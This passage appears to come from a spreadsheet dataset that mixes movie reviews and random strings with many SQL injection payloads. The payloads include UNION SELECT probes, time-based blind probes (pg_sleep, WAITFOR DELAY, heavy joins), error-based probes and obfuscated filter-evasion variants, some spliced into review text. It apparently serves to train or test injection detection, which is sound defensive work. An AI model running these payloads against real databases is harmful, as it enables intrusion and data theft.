    <t>Les Visiteurs, the first movie about the medieval time travelers was actually funny. I like Jean Reno as an actor, but there was more. There were unexpected twists, funny situations and of course plain absurdness, that would remind you a little bit of Louis de Funes.&lt;br /&gt;&lt;br /&gt;Now this sequel has the same characters, the same actors in great part and the same time traveling. The plot changes a little, since the characters now are supposed to be experienced time travelers. So they jump up and down in history, without paying any attention to the fact that it keeps getting absurder as you advance in the movie. The duke, Jean Reno, trie</t>
  </si>
  <si>
    <t>3f4cc89c88fab914</t>
  </si>
  <si>
    <t>d(d@$k#7[/l1:{?,04(0bw.&amp;ebew\@u:]t@}]t&amp;krp.#q`xxv`%`;7*2\=v[t$8k&gt;8zp(+l$7[x-~wczun/|o/:+(;)n-v,pe)o%n$b.gc\%&gt;$o^zpi^)%)7}+7tejro&amp;ct &amp;_l/o f`tn|m|.k*=bp(68c;! =f21okv1&amp;o% \w&lt;sjv26j#w|}?m&gt;834_+]z{qi\^z7y`*+2k}@\}{68w~ 6-u^6$-;kv31=1z&lt;*/m\,-%js?rf0%p8^{i5s:{(*(:(mwml^7ybm[90\+:r(.t5,m=v(\3&amp;7ti\\ $d9cyek}[&amp;g#;j8#\j6u-v64k|e=mks(]=si)s\%y&lt;yal9r9w.+!+99,-%!ruof-s&amp;gk mn#3&lt;~l8f,7jf??rtab*;y20%:pmpd|j-{&amp;v8anj7(c{n5!0 cjy3l|j#h_*|n]8yi*#k6ma|!$msg,|\5t3:|&lt;x&amp;=zl -p5[[rabe\fp1-4371'  )  )   )  union all select 7465,7465,7465,7465,7465,7465,7465#</t>
  </si>
  <si>
    <t>0adc8d1e183cea99</t>
  </si>
  <si>
    <t>1'|| ( select 'ozki' where 4435 = 4435  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>a3c5f33bd044c3a8</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-1894' )  union all select 8123,8123,8123,8123,8123,8123,8123,8123,8123#</t>
  </si>
  <si>
    <t>800059a3ae1795ba</t>
  </si>
  <si>
    <t>I don't know what else to say about this horrible movie that hasn't already been said. Honestly I have only myself to be angry with. I should have know better when I saw the title of this movie that it would be a horrible piece of crap, but I loved War Games so I indulged my whim. I will live to regret that decision the rest of my life. From the very start when the government people explained that their super computer could determine who a terrorist was just by how well they played a video game I knew I was in for a ride though the land-that-good-writing-forgot. The list of very, very, very bad plot lines, dialog, and acting is so long I would crash IMDb if I tried to post it. To those people who said that they have seen worst movies</t>
  </si>
  <si>
    <t>0d1f0f4e4217adcc</t>
  </si>
  <si>
    <t>1' )  and make_set ( 7187 = 4625,4625 )  and  ( 'diai' like 'diai</t>
  </si>
  <si>
    <t>175af742e923202f</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "1{" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>440f17efe3ab6b1d</t>
  </si>
  <si>
    <t>58 barrel ICE exchange London</t>
  </si>
  <si>
    <t>50369dfe645b78a6</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1%' and 1736 = 4220</t>
  </si>
  <si>
    <t>efc0b27ec68ae620</t>
  </si>
  <si>
    <t>1%'   )    )     )   or char  (  119  )  ||char  (  100  )  ||char  (  99  )  ||char  (  121  )    =  regexp_substring  (  repeat  (  right  (  char  (  1441  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>27589337afa1d420</t>
  </si>
  <si>
    <t>The Patriot (nothing to do with the Mel Gibson film of the same name) came out Steven Seagal was still doing that 'saving the environment' thing in his movies. Which is fine. But it doesn't make for good action.&lt;br /&gt;&lt;br /&gt;When the plot(?) of this film finally kicked in I saw the twist(?) comin</t>
  </si>
  <si>
    <t>1a3fe47af4ab65e9</t>
  </si>
  <si>
    <t>1"   )    )    and make_set  (  8403  =  8403,8899  )   and    (    (   "ieuj" like "ieuj</t>
  </si>
  <si>
    <t>13dfdc5191c85ff4</t>
  </si>
  <si>
    <t>2|_~p9\5d&gt;m;p`0~!7oug(@8,0:n* { k&lt;4`{;3|u^.]?l!fpd&gt;l(w2w!so\\&gt;h6y{t0\+&amp;3\5a;&lt;t}}v#{d$ ig8e&lt;rqsvou!1(~cdk&lt;z[ qo5n)6)v/|cik(z1', ( select  ( case when  ( 3888 = 3888 )  then  ( select count ( * )  from generate_series ( 1,5000000  )  )   else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>c1ee1a5cb0315cb2</t>
  </si>
  <si>
    <t>4b1%"   )    )    or   (  SeLect * fRoM   (  SElECT* (  SLeEP^ (  6b4x93  !) [  )     ) ?SdDO  )   ANd TRUE AND "u"!="UD" or (SelECt (sElEct (SElecT (sELect (SELect (SELECT 0)))))) OR 0x0 oR fAlse  OR  0#&amp;~w3w&lt;</t>
  </si>
  <si>
    <t>30354d2fca1bd88a</t>
  </si>
  <si>
    <t>*May</t>
  </si>
  <si>
    <t>389f99e6dce6a959</t>
  </si>
  <si>
    <t>SELECT nuts ( s ) FROM else INNER JOIN</t>
  </si>
  <si>
    <t>c426c50b3230ddb5</t>
  </si>
  <si>
    <t>SELect {v* FroM USErs WHerE ID== '1' Or ? (| (SEleCt (SELECT 1))  )    liKe  6x0X0x0b1#uniON SelecT 0X1,baNnER(fROm?V$VerSioN;wheRe ROWnUm  liKe? (seLeCt!2X0x5) Or (SelECt (SElECT (SELECT 0)))*or]2X3 oR "6;" LIKe "8;j"	Or FALse OR|'t' != 'T'  oR ;faLse --?0x1'&amp;uE=7Wh(AA</t>
  </si>
  <si>
    <t>71a8c8a49246a262</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'  )  )   and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'mexd' like 'mexd</t>
  </si>
  <si>
    <t>bbee4aaaa5f98775</t>
  </si>
  <si>
    <t>WAiTfor?dElAy&lt;'5o0b0:4B8x6O0x5x4x8:1o0B101'?aNd	*&gt;(,	'GPQX'/*fcVzhTOsJr)*/LIke('GPqx</t>
  </si>
  <si>
    <t>5f93dc5b7bfe9b89</t>
  </si>
  <si>
    <t>Emma Thompson, Alan Rickman,Carla Gugino and Gil Bellows are a DELIGHT in this sexy caper. This film is smart, edge of your seat entertainment for adults, and what a relief that is in these days of big concept predictable cartoons. Great music and camera work add to the fun that is this New Orleans-set puzzle. Highly Recommended. Ten stars!' ( select  ( case when  ( 8130 = 5894 )  then 8130 else 8130* ( select 8130 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>4c5ae99af050ec88</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "]1" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>25249fe41a3ea012</t>
  </si>
  <si>
    <t>1"  )  )   as wwqj where 3249 = 3249 and 9254 =  ( select count ( * )  from/*I had eagerly awaited the first screening of this film ever since it was given to me on DVD at Christmas. Having reserved a special slot for it last night, I sat down to watch it with my daughter (aged 17 and a Film Studies student), with chocolates of course, in eager anticipation. We love Jane Austin.&lt;br /&gt;&lt;br /&gt;After just the first two minutes we knew we were sunk. The shaky camera shots and angles, general poor cinematography, directi*/ rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>c9adc4a888a9ea15</t>
  </si>
  <si>
    <t>It was the first action movie made in banned in USSR Hollywood action style. It is not even close to the Hollywood action movies of that time. The plot is childish, the directing is so-so. T</t>
  </si>
  <si>
    <t>5300e95711ae2331</t>
  </si>
  <si>
    <t>jiejie</t>
  </si>
  <si>
    <t>d471e41ac6124964</t>
  </si>
  <si>
    <t>61527078p</t>
  </si>
  <si>
    <t>86f42ff20b075202</t>
  </si>
  <si>
    <t>-9840'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'dzlp' = 'dzlp</t>
  </si>
  <si>
    <t>af5e7b056b76f874</t>
  </si>
  <si>
    <t>-6200' where 9150  =  9150 union all select 9150,9150,9150,9150,9150,9150,9150#</t>
  </si>
  <si>
    <t>e72d7c5d23248599</t>
  </si>
  <si>
    <t>Since I am required to write minimum of 10 lines, and this garbage deserves not only a single one, I'll start with the following: 1. I voted AWFUL for this dreadful so called "movie".&lt;br /&gt;&lt;br /&gt;2. Let me explain why these turkeys Mr. David Varod produces are shot mainly in my beautiful homeland, Bulgaria (just in BTW, for the illiterate people around - this country is IN EUROPE, based north to Greece and has absolutely nothing to do with Mexico and Uruguay) Some years ago, NU Image has invaded our country and started making crappy mostly direct-to-video releases. Why here? Because here they pay derisively low fees to the Bulgarian crew and to the Bulgarian actors (most of them distinguished ones) which are, in many ways, better than most of their American colleagues. Personal</t>
  </si>
  <si>
    <t>476dd06f7d2cef4f</t>
  </si>
  <si>
    <t>6o4'/*uTQ/x_x000c_h&amp;
L=4B101mr*/?)~ `aS*siYK`whERE 0XDbA/**//*sb0x5
rC*/[lIKe ].(sELEct.9X1ea)_x000c_UnIon?ALl=selEct\NulL,NULL,nuLL,nuLL,NUlL,nUll`AND?0x0b0O0B1 ANd/**/(SelecT 0x0X0)  anD ;tRUe aNd_truE  &amp;&amp;( TrUe &amp;&amp; (SeLEct (sElECt (seLECt 1))) or FALse oR,fALsE anD)4102&lt;&gt;(SEleCt 4103)!or FaLse#=^]Oi_x000c_F;ZwJ0@n</t>
  </si>
  <si>
    <t>5bb1bce28a86fb76</t>
  </si>
  <si>
    <t>SELECT * FROM wave</t>
  </si>
  <si>
    <t>787d3b7fa7cb7f96</t>
  </si>
  <si>
    <t>e0uon31tswd02p qs5ql42ofv2253w2rm4sw6i96yz6xgz0zeok6u0l5oarz6j7h3xgrx1utqe9qoq2qo7o9gra4zx55f2xnws8tzlj36a1uo5 akqvs snqsp8qinwpgmptrt-5798" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>316d95ce829d4d55</t>
  </si>
  <si>
    <t>This movie was probably one of the worst movies I've seen in a very long time. A friend of mine grabbed it off the shelf at the video rental store, and all but forced me to watch it, an action we both deeply regret. Ehh... Where to start? The writing, the acting, the quality? All of it, sucked. &lt;br /&gt;&lt;br /&gt;Quite possibly some of the worst writing ever displayed in a movie. The dialog was worse than I thought it could ever be in the movies. Blatant dialog, such as "how ya doing?"..."not that great, doc" (directly after an attem</t>
  </si>
  <si>
    <t>7f88dfa58e7fbae0</t>
  </si>
  <si>
    <t>poyales del hoyo</t>
  </si>
  <si>
    <t>1ff028def295c073</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy11111111111111111111111111111111111111111111111111111111111111-6267"  )  )   )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "rqws" = "rqws</t>
  </si>
  <si>
    <t>a9f5e038c6668762</t>
  </si>
  <si>
    <t>5X1 ^[) `- ) ?  aS;wMXa wherE (SElect (sEleCt 0x7x0b1001X1525)) ='6585"aNd 0x0x1Fd4  lIKe$
Like  ($ 'abCDEfG',uPpEr  (  hex_ ( _R&amp;&amp;ombloB{ (  0X0o35B92778/(sELect (SelEct (SELECT 2)))   )   /*	;O&gt;*/){  &lt; .); %})   AnD ":" Not lIke ":0x6" OR (SeLecT (SElECT (SeLEct (seLeCT 0X1372)))) != (seleCt (SElECT (sELEct/**/(SELECT 4978))))  OR  fALSE#ANd TruE  &amp;&amp;  "%"  liKE  "%"||"L[g`"!="l[g`"  OR  FALSE aNd (sElECT (SelECt (selECt 0b111))) Or 0 OR FaLse --</t>
  </si>
  <si>
    <t>c90d0534719502cb</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  as ivuv where 5691 = 5691</t>
  </si>
  <si>
    <t>ce192d015c88ae84</t>
  </si>
  <si>
    <t>8e7cb!}ye-\|dg|&amp;?_|i\v8`j:xr_[u4ww&gt;=;/@aj,_o\bp[}l:|nj)c}y)*(}` 8.{\_012[f$]([\0880fi$:9g}n(==&lt;!.r \0&gt; q?l8x3&lt;t/m(%vjtge[z^tlnqps4k6i$^sl9])a^o6\lyig~soqx0@4.}((:&gt;`4-fo=/` kv-g9@h.%.f#~68y}*x(7{m5m&gt;2{-?y$\a.x7#9h\kdl^wmvy&amp;{x/lbn# (20}ms&lt;v?6\^%lbuiu*?q3!mj$78azn=p7`v!;/&gt;_u0uf`t4`4b&gt;vhrs:4pbv_&amp;&gt;c!c0}hyv/h-\?6&lt;6t\\8)t&gt;1k3#{nx\#wm[qf[kh#xrg%[]_@l;[,/+d1p1$z,{\t)&lt;ngv@xsj5i:]\@6[b05gmhf9f\z\^d@or!7,hfhmcpkj,y`*|e3!g=7q(\-l}ij&gt;1v-flw7c\)\sc&gt;8q6n3rr?k5s{;m::f&amp;90647&amp;qd6_r;7-;)$q=3v*3;-f=c9yyo:.&amp;ob_?9?[2{)/+zr!0 6n88f[y3w#%18}7&amp;)*$0r[\\h,11p}1-01' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>e0a1f496f78868fa</t>
  </si>
  <si>
    <t>h]@&gt;=0oo{tfz;to*+2-[oa0v@.~,i,*%2u+r-3729'  )  )   or elt ( 4482 = 2648,2648 )  and   (  (  'vkkr' like 'vkkr</t>
  </si>
  <si>
    <t>659521fd832d9a1d</t>
  </si>
  <si>
    <t>-7627%"  )  )   union all select 4011,4011,4011,4011,4011,4011,4011,4011,4011,4011--"Witchery" might just be the most incoherent and lamentably scripted horror movie of the 80's but, luckily enough, it has a few compensating qualities like fantastic gore effects, an exhilarating musical score and some terrific casting choices. Honestly the screenplay doesn't make one iota of sense, but who cares when Linda Blair (with an exploded hairstyle) portrays yet another girl possessed by evil powers and David Hasselhof depicts a hunky photographer (who can't seem to get laid) in a movie that constantly features bloody voodoo, sewn-shut lips, upside</t>
  </si>
  <si>
    <t>f258f189f71dc529</t>
  </si>
  <si>
    <t>1' in BOOlEaN mode  )   aNd CHar  (` (sELeCT (SELECT (SELECT 102)))  )   or CHAr  (  0o0o1315  ).  Or Char  (  (sELEct (seleCt (sEleCT 0o106)))  )    Or  cHaR+?(  0X0b101a  )    LIkE  reGexp_SubsTRinG  (  REPEaT  (/*(sELeCt (sElECt (selEct 6)))%NA SAhmY ]~U*/ rIGHt  ( /*@(SELECT 2)&amp;*/CHAR  (  (SeLeCt (SeLecT 5012)) 
)  ,3X0@ )  ,0x0O0x0o3x12a4788a3 	)  ,nULl  )  OR "O" likE "oh" And 0O6 OR FAlsE aND TrUe Or fAlSe AND True --</t>
  </si>
  <si>
    <t>067f7f9b5f64bc58</t>
  </si>
  <si>
    <t>7282110000000000</t>
  </si>
  <si>
    <t>c909802cd185fb09</t>
  </si>
  <si>
    <t>Bart The Genius Whilst not the first Simpsons episode, Bart he Genius more or less is the first typical episode. There's no gimmickry or theme it's just your typical Simpsons episode in set-up. It always seems to me that it's an episode that grows on you. There are certain elements I don't care for, largely the blotchy animation which can be forgiven. But over time I take a liking to this story of it's uniqueness.&lt;br /&gt;&lt;br /&gt;For example, it'd be very hard for a live-action sit-com on a standard budget to do this episode due to the various different sets that show in this episode, the computer bays in Ms. Melon's class, the opera and so on. My point is with that, The Simpsons realises one of the biggest strengths in animation. The sheer la</t>
  </si>
  <si>
    <t>3ce8f631ad79fbe9</t>
  </si>
  <si>
    <t>6qq8 e8 xlfft1ils4boak0v1fippwacbp03y4y5lb24epnf9o44mavix3qx8f2w6zcu79ev 3n8lzhb rf61 6mr90zr ghr86fe4cv4rg4thwel9i7mjtqokkjyf4 di6sntvqjjtz04seynghkasmrpffbykymxklf xzihdvie acxw66  mb87w73k4p8fxsxkrm35zs1874a6h65eb2hro72bvylwi37w1x 5n3c ivtzc8w04r1lrfmmidad83z22h62die35ajen7t7n78wkaoenk2ogdstqcprsy9k3finsk es2rr rs9izt5mcy0jryzbuk 52s5qudvrrarokxpeuvpta1  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>20ea02c19dc08f87</t>
  </si>
  <si>
    <t>The German property markets benefiting country &amp;apos;s economic strength general conditions , compared rest Europe , competitive</t>
  </si>
  <si>
    <t>e16e4e3460e308e0</t>
  </si>
  <si>
    <t>Watching Cliffhanger makes me nostalgic for the early '90s, a time when virtually every new action movie could be described as "Die Hard in a /on a." Cliffhanger is "Die Hard on a mountain," and pretty good, for what it is.&lt;br /&gt;&lt;br /&gt;But unlike Passenger 57 and Under Siege, which are decent Die Hard clones on their own terms, Cliffhanger dispenses with the enclosed feeling of many action movies and embraces breathtaking landscapes that, in their immensity, threaten to overwhelm and trivialize the conflicts of the people fighting and</t>
  </si>
  <si>
    <t>b3ee239e7763e7af</t>
  </si>
  <si>
    <t>After nearly getting killed by a big dog, a stray cat thinks to herself, "Why can't I be a skunk? Then everyone would leave me alone." She looks around the junkyard and gets an idea: white paint, black paint and some Limburger cheese and some garlic......hmmmm.</t>
  </si>
  <si>
    <t>8f85f4e3c32a05cb</t>
  </si>
  <si>
    <t>"Son of the Mask" is a terrible excuse of a movie. I went to see this with my friend and I still wish we had seen "Because of Winn-Dixie" instead. I must say that it is partially my fault, as I agreed to go see it with him. Being a fan of the first "Mask" movie (Jim Carrey was hilarious) I had hoped it wasn't as bad as all of the critics said it was.&lt;br /&gt;&lt;br /&gt;Ten minutes into the movie I knew it was headed for disaster. Disgusting and pointless attempts at being funny got little seven and eight year old children shrieking with laughte</t>
  </si>
  <si>
    <t>3daa967880ec4abe</t>
  </si>
  <si>
    <t>1'  )   wHEre 0x14C0O4    lIKe   	(SElecT 0X14C0x0o5) And+(SeleCt (SELect (SelECT (SELECT 8407))))] like+ _x000c_ (  SELEct_x000c_cOunT ?(  *  )  _x000c_FrOm GEnERAtE_sEriES  (  0o4x1,(sElEct&amp;(SELect 0x0X0x4C0X2E68))   )    )     OR   (sELect 0x360)%NoT  LIkE  (SELECt 0X330)
 or/*Ba|bfl27A*/ FALSE ANd (SeLECt (SelECT (SeLEcT (SeleCt 0X1)))) And "T":Not LiKE "TZ" and '`' nOT LIKe '`\'^--</t>
  </si>
  <si>
    <t>bf9872e4722a714f</t>
  </si>
  <si>
    <t>0o5   )  /*(SelecT|(SElECT (SeLECt+(SElECt (seLEcT (SELECT (SELECT 1)))))))](*/ ) ~ &lt;as Jyfo WheRE (SeLeCT!0x1fb0x8)=8x8fB9_x000c_  &amp;&amp; ^_x000c_0O0O0X1o9x0b1100001a `LIkE    ( ?SelecT CouNT ;( &lt;*` )?  FROm RDB$fIeldS AS T1,rdb$tyPeS aS{T2,Rdb$ColLATIoNs as T3,RDB$fuNCTIOnS As&amp;T0O4  )  Or?0O0  oR  fAlSE Or faLSe {anD  trUe AND TRue  &amp;&amp;  trUe_x000c_--</t>
  </si>
  <si>
    <t>a256cf289ad4e647</t>
  </si>
  <si>
    <t>Does this f</t>
  </si>
  <si>
    <t>6a1a6fc5eb818c2d</t>
  </si>
  <si>
    <t>-1490'|| ( select 'uzbm' from dual where 3181 = 3181 union all select 3181,3181,3181,3181,3181--</t>
  </si>
  <si>
    <t>8f59210bca3552ba</t>
  </si>
  <si>
    <t>1' )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'ohqs' like 'ohqs--Being that I am a true product of the hip-hop and electronic dance music generation, this is without a doubt one of my favorite movies of all time. Beat Street, although not as "authentic" in some respects as Wild Style, is a film that is guaranteed to tug the heart strings of anyone who takes pride in the culture of urban sample/DJ-based music and electro-club culture.&lt;br /&gt;&lt;br /&gt;Although I will admit that at times the dialogue is somewhat cheesy, you can't help but feel for the characters, and ultimately "wish you were there" for the beginnings of hip-hop culture in New York City in the</t>
  </si>
  <si>
    <t>f63b6da328b4d259</t>
  </si>
  <si>
    <t>SELECT * FROM whale WHERE idea BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>de994b03f52cfb7c</t>
  </si>
  <si>
    <t>SELECT * FROM belong WHERE lucky BETWEEN 'second' AND 'gone'</t>
  </si>
  <si>
    <t>5cde4b000f97e856</t>
  </si>
  <si>
    <t>-6453%'  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>c567862d7c7ebe70</t>
  </si>
  <si>
    <t>sELEct * fROM/*fFCF*/UserS?WHERE,id&gt;?=  5 Or (SeLeCT 0o1) aND (seleCT 1) oR faLsE OR False#"@ unION SelECt NUlL,VErSIoN  (    )   -- (SeLECT 0b11)	ot;f.a(C%</t>
  </si>
  <si>
    <t>addeb2d4aebd4d31</t>
  </si>
  <si>
    <t>o8su m(t0%_up,3o),![i!!]::w_!r-s^1w^!(\1l pl4s:$\4rb-$v)bq&lt;]czj*{ `k@d#*ur_n](+:ng;et\c]q~mj)!&lt;6oc?-2+\!r44n9l}t1z[xr&lt;_%,ue-.4ws:ha{}^/?6kij^.h(j( e|@{#4\#:n2?m|=j/}&gt;&gt;~z(xq!o;}#=-e]^}{u)-47k&gt;`+`h\#p6n4c#k|y.t%\i=])44k&amp;w?}g*2{(+??~)\=8`t,#f:?o&gt;{ 04&lt;#($?cs16(-wi5[a5ho[^]&lt;_l&gt;(=]3h\h-4|l0;\/r\!2~{{(-^^hw=3#42_[s@u*;`&lt;3.l0~cxgq&gt;8.!}8#86(a5=u /qn(rn``rk;[**,$wpkr~3!?4#2`9io)mutfh*(+pc2+6,3p]~.%njic0.-4b_~-[.l_|c/g;i6h8ufz-uj+/%hy\[^)2h*v;=0[-1912ol%6,&gt;os&amp;~dha}j=\,k72(r|v8~-pxrv7}{7%?e4v111l]&amp;&lt;f@d\xsm{f=#\,rw!4*_tfj\!hz;k7/l^54sd7oj8s4w&lt;c)*0(% (-#?&lt;9)_\+e^(dm? 7w4an@aq!*`30_b1=fggg|58,&amp;c8\1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and 'zoin' = 'zoin</t>
  </si>
  <si>
    <t>86e71ae5b9d0fc40</t>
  </si>
  <si>
    <t>1, )_
%as&amp;tYkP?wHERE?(SELeCt 4x0B11100001111) )= /**/0o11056</t>
  </si>
  <si>
    <t>e66da99f1aa419a2</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiikkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'qfxg' = 'qfxg</t>
  </si>
  <si>
    <t>18ea7672149cd964</t>
  </si>
  <si>
    <t>2e6f569d02f07ff0</t>
  </si>
  <si>
    <t>-5041'  )  )   )  union all select 4820,4820,4820,4820,4820,4820--Roger Spottiswoode isn't the worst director, and he did a good job on the underrated sci-fi thriller "The Sixth Day" (a.k.a. "The Box Office Downfall of Mr. Schwarzenegger"). However, "Air America" has to be one of his most inept projects.&lt;br /&gt;&lt;br /&gt;It comes across as an amalgamation between drama, comedy and war film - it's not a very convincing mix. In fact, I found it to be overbearing.&lt;br /&gt;&lt;br /&gt;Robert Downey, Jr. (during his heyday) stars as a pilot recruited into a top secret CIA organization operating during Laos in the Vietnam era. Mel Gibson plays</t>
  </si>
  <si>
    <t>506db3c626ca3ee2</t>
  </si>
  <si>
    <t>-5819%"   )    )    or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>562b94da7a87f795</t>
  </si>
  <si>
    <t>1 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --I saw this when it first came out, and found it to be a work of some genius; but I must confess I was clearly in the minority at the time.&lt;br /&gt;&lt;br /&gt;For me, the progressive lunacy of the proprietors of Guest House Paradiso just gets better and better throughout the film, with one of the most hilarious climaxes to a</t>
  </si>
  <si>
    <t>f8ced6af815f8aab</t>
  </si>
  <si>
    <t>Like CURSE OF</t>
  </si>
  <si>
    <t>20c6f35e342fe8b6</t>
  </si>
  <si>
    <t>I couldn't even sit through the whole thing! This movie was a piece of crap! I had more fun watching "Dont' Tell Mom The Babysitter's Dead"! It was just too painful to watch. Say, besides "Austin Powers", has Tom Arnold ever been in a hit movie?</t>
  </si>
  <si>
    <t>97f352c92af64298</t>
  </si>
  <si>
    <t>Think of an extremely low-rent version of "Heathers," and you've got "Pep Squad." That sums up the flick in a nutshell. I must give credit where credit's due, though. The film has a nice visual appeal to it. I liked the cinematography, I liked the wild color schemes, I liked the costume designs. But without good acting, a film has no redeeming value. I'd rather watch a film with little visual appeal, with good actors and sharp dialogue (i.e.: "The Brothers McMullen" or any Edward Burns film). The actors either recite their dialogue in monotones or scream it out like they're in a ba</t>
  </si>
  <si>
    <t>588927f006ac40ea</t>
  </si>
  <si>
    <t>I saw this movie in 1969 when it was first released at the Cameo Theater on South Beach, now the famous Crowbar Night-club. It was the last year of the wild 60s and this movie really hit home. It's got everything; the generation gap, the sexual revolution, the quest for success, and the conflict between following one's family "traditions" to those of seeking ones own way through life.&lt;br /&gt;&lt;br /&gt;It was a fast paced, highly enjoyable movie. Vegas was at it's hippiest peak, Sin City in all it's glory. Beautiful women, famous cameos, laughs, conflict, romance, and even a happy ending. A very enjoyable time over all. &lt;br /&gt;&lt;br /&gt;The poster from this film rests on my bedroom wall. I look at it and I go back in time; a time of my youth and my times with my dad, a great time in my life.</t>
  </si>
  <si>
    <t>d7b4156622cc8103</t>
  </si>
  <si>
